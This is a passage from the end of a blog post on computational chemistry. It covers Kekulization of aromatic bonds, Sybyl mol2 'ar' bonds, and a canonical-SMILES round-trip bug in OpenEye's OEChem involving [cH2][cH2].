    The Kekulization algorithm remains pretty much the same, but makes no distinction between cyclic/acyclic atoms or bonds. Any default bond between two atoms marked as aromatic needs to be kekulized. Terminal atoms must be sp2 or the Kekulization algorithm backtracks.

    A similar kind of "latitutude" is required for the kekulization routines to handle Sybyl .mol2 files, where "ar" bonds often appear in things like guanidines, carboxylates, sulphones, etc...

    There you go.

    A strange problem

    Wait, did you think I was done? I've only written 650 lines of HTML - I've more to say on this! I asked Roger why using their code, with no extra aromaticity done, generates the following:

    parsing [cH2]-[cH2] generates canonical SMILES [cH2][cH2]
    parsing [cH2][cH2] generates canonical SMILES c=c
    
    Interesting that a generated canonical SMILES is not identical to itself!

    This is an obscure corner-case bug in OpenEye. Roger points out that it's the same reason that the explict "-" must be generated if the two end-atoms are aromatic, connected by a single bond and in ring. In this case OEChem also needs to generate a "-" between two non-ring single-bonded aromatics.

    Finishing with another quote from Roger:

    Of course, Daylight never has this issue as it makes no attempt to preserve the user's aromaticity model on input or output. [And therefore is unable to read some SMILES it generated in earlier versions, or report warnings about molecules with dubious aromaticity]
    Okay. I'm done now except for the advertising bit. Feel free to add your own comments.


    Andrew Dalke is an independent consultant focusing on software development for computational chemistry and biology. Need contract programming, help, or training? Contact me



    Copyright © 2001-2008 Dalke Scientific Software, LLC.